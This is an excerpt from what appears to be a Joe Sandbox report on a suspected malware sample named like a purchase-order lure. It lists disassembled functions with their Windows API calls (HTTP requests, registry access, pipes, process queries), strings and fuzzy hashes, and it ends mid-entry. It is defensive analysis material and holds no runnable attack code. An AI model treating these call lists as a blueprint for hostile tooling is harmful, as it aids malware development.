                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                • String ID: 0
                                                                                • API String ID: 4152858687-4108050209
                                                                                • Opcode ID: 0a96add73e910398c50c240935908b535ad52267fbfe38cc3b497cdc09e37aa3
                                                                                • Instruction ID: 8d65d54c91bb2834d650baaa5c58db0a2d3f708132dab7008ae6ceb83fe6ffca
                                                                                • Opcode Fuzzy Hash: 0a96add73e910398c50c240935908b535ad52267fbfe38cc3b497cdc09e37aa3
                                                                                • Instruction Fuzzy Hash: BF51DD71208B01AED7249E28DA44A6F77E8EF44314F040A2FF880D7291EBB8DC44875B
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: _memmove$_free
                                                                                • String ID: 3cA$_A
                                                                                • API String ID: 2620147621-3480954128
                                                                                • Opcode ID: f7f7aa10a2776cebec5ab41bedefafc6019a57301ab68c68974e4ad1fc490e58
                                                                                • Instruction ID: 850dd104c1974142ce8a52b298ec70faaced32133f8a19a743ede36878807482
                                                                                • Opcode Fuzzy Hash: f7f7aa10a2776cebec5ab41bedefafc6019a57301ab68c68974e4ad1fc490e58
                                                                                • Instruction Fuzzy Hash: C7518C716043418FDB24CF29C840BABBBE1FF85304F49482EE98987351DB39E941CB4A
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: _memset$_memmove
                                                                                • String ID: 3cA$ERCP
                                                                                • API String ID: 2532777613-1471582817
                                                                                • Opcode ID: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                                                                                • Instruction ID: eaf8e981165fb7e982de03985e75bf568e49202a02b644e32a28802e4b47c64a
                                                                                • Opcode Fuzzy Hash: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                                                                                • Instruction Fuzzy Hash: 02518C71A00709DBDB24DF65C9817EBB7F4AF04304F2085AFE94A86241E778EA858B59
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 004627C0
                                                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004627DC
                                                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 00462822
                                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C5890,00000000), ref: 0046286B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Delete$InfoItem_memset
                                                                                • String ID: 0
                                                                                • API String ID: 1173514356-4108050209
                                                                                • Opcode ID: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                                                                • Instruction ID: 6162d5963bf1ca612739d8e457cf9df7481532cfa70a9704744149088ee17d1e
                                                                                • Opcode Fuzzy Hash: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                                                                • Instruction Fuzzy Hash: F141AE70604701AFD720EF29CD44B1BBBE4AF84314F044A2EF96597391E7B8A905CB6B
                                                                                APIs
                                                                                • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5
                                                                                  • Part of subcall function 0040784B: _memmove.LIBCMT ref: 00407899
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharLower_memmove
                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                • API String ID: 3425801089-567219261
                                                                                • Opcode ID: 85bf6583a6d5216460642c634f58536033cb8f756531c513cb924ba6ba7dc0f0
                                                                                • Instruction ID: 0be9701992b4b91cd2e68042300235638f00ad80fed84879f118ea648425d64e
                                                                                • Opcode Fuzzy Hash: 85bf6583a6d5216460642c634f58536033cb8f756531c513cb924ba6ba7dc0f0
                                                                                • Instruction Fuzzy Hash: 783191719142159BCF00EF55CC919EEB3B4FF14324B108A2BE839A76D2DB39AD05CB95
                                                                                APIs
                                                                                  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                  • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00458F14
                                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00458F27
                                                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 00458F57
                                                                                  • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$_memmove$ClassName
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 365058703-1403004172
                                                                                • Opcode ID: ddad20509fe9b3e1c31c3b2e57fd2caf3c7aa24dd0e867efcdf563172e2aeebf
                                                                                • Instruction ID: 808fcc3072a567dbeea6ba3b2dea5d83030b8b2133ef71414da725dc7de09f99
                                                                                • Opcode Fuzzy Hash: ddad20509fe9b3e1c31c3b2e57fd2caf3c7aa24dd0e867efcdf563172e2aeebf
                                                                                • Instruction Fuzzy Hash: 1021F572A00108BEDB14ABA19C45DFF7769DF05324B10462FF825B72E2DE3D180E9A28
                                                                                APIs
                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0047184C
                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00471872
                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004718A2
                                                                                • InternetCloseHandle.WININET(00000000), ref: 004718E9
                                                                                  • Part of subcall function 00472483: GetLastError.KERNEL32(?,?,00471817,00000000,00000000,00000001), ref: 00472498
                                                                                  • Part of subcall function 00472483: SetEvent.KERNEL32(?,?,00471817,00000000,00000000,00000001), ref: 004724AD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                • String ID:
                                                                                • API String ID: 3113390036-3916222277
                                                                                • Opcode ID: 6e03d3876d11c1f4078e21f2429e25c28f700f0be32576d9d2588f00842c0ae0
                                                                                • Instruction ID: 9f195ba99928d8c49214c982579914efbee4b11eb605a7749f470a37591c6317
                                                                                • Opcode Fuzzy Hash: 6e03d3876d11c1f4078e21f2429e25c28f700f0be32576d9d2588f00842c0ae0
                                                                                • Instruction Fuzzy Hash: 1021B3B15002087FE711AF65DC85EFF77EDEB48748F10812FF44992250DA688D0957AA
                                                                                APIs
                                                                                  • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                                  • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                                  • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00486461
                                                                                • LoadLibraryW.KERNEL32(?), ref: 00486468
                                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0048647D
                                                                                • DestroyWindow.USER32(?), ref: 00486485
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                • String ID: SysAnimate32
                                                                                • API String ID: 4146253029-1011021900
                                                                                • Opcode ID: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                                                                                • Instruction ID: 96a79e02294e314170444e54cb88eb83d8519b29eeb49143b64c907e724dd28e
                                                                                • Opcode Fuzzy Hash: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                                                                                • Instruction Fuzzy Hash: 2C219571110205BFEF506F64DC40EBF37ADEF54724F114A2AF91492190D739DC41A768
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00466DBC
                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466DEF
                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00466E01
                                                                                • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00466E3B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHandle$FilePipe
                                                                                • String ID: nul
                                                                                • API String ID: 4209266947-2873401336
                                                                                • Opcode ID: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                                                                                • Instruction ID: cca2de9678abd998f0cd8c5114a45f7ff5fc269ace22cdb61a343b4aec1dc2fa
                                                                                • Opcode Fuzzy Hash: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                                                                                • Instruction Fuzzy Hash: 8B219274600209ABDB209F29DC05A9A77F8EF44720F214A2FFCA0D73D0EB759955CB5A
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00466E89
                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466EBB
                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00466ECC
                                                                                • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00466F06
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHandle$FilePipe
                                                                                • String ID: nul
                                                                                • API String ID: 4209266947-2873401336
                                                                                • Opcode ID: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                                                                                • Instruction ID: 3a9fffd2e99ff55030e4788a991c608e9c08d8bb738c80722c17144d2858802a
                                                                                • Opcode Fuzzy Hash: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                                                                                • Instruction Fuzzy Hash: 7B21C7795003059BDB209F69CC04A9B77A8EF44724F210B1EFCA0D33D0E7759851C75A
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0046AC54
                                                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0046ACA8
                                                                                • __swprintf.LIBCMT ref: 0046ACC1
                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,0048F910), ref: 0046ACFF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                                                • String ID: %lu
                                                                                • API String ID: 3164766367-685833217
                                                                                • Opcode ID: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                                                                                • Instruction ID: 026ba00fef41ead7d753cb67677e2cef5533d5e87c35db631ff5a0b10e4673a5
                                                                                • Opcode Fuzzy Hash: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                                                                                • Instruction Fuzzy Hash: FE217470600109AFCB10EF65C945DAE77B8EF49318B10447EF905AB252DA35EE55CB25
                                                                                APIs
                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046115F
                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 00461184
                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046118E
                                                                                • Sleep.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 004611C1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                • String ID: @F
                                                                                • API String ID: 2875609808-2781531706
                                                                                • Opcode ID: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                                                                                • Instruction ID: bb6757969e877831e55d7075b4886ee1e071d58b2ed1133263d880316bc49dff
                                                                                • Opcode Fuzzy Hash: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                                                                                • Instruction Fuzzy Hash: B5113071D0051DD7CF00DFA5D9486EEBB78FF0E711F04446ADA41B2250DB789954CB9A
                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047EC07
                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047EC37
                                                                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0047ED6A
                                                                                • CloseHandle.KERNEL32(?), ref: 0047EDEB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                • String ID:
                                                                                • API String ID: 2364364464-0
                                                                                • Opcode ID: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                                                                                • Instruction ID: fffec5fe55f17e3d6af6322d033c5a61601868e7b6c72126a0bd4eac84abd099
                                                                                • Opcode Fuzzy Hash: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                                                                                • Instruction Fuzzy Hash: F38191B16007009FD720EF29C846F6AB7E5AF48714F04C96EF999AB3D2D674AC44CB49
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                • String ID:
                                                                                • API String ID: 1559183368-0
                                                                                • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                                • Instruction ID: c535a9b74c3be08fb66675131960c2e3f57dfdec9721024cad96d7a05cd33cf3
                                                                                • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                                • Instruction Fuzzy Hash: 9051BB30B00B15EBCB149E65F84066FB7B2AF40325F94472FF825963D4D7789D918B49
                                                                                APIs
                                                                                  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                  • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004800FD
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0048013C
                                                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00480183
                                                                                • RegCloseKey.ADVAPI32(?,?), ref: 004801AF
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 004801BC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                • String ID:
                                                                                • API String ID: 3440857362-0
                                                                                • Opcode ID: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
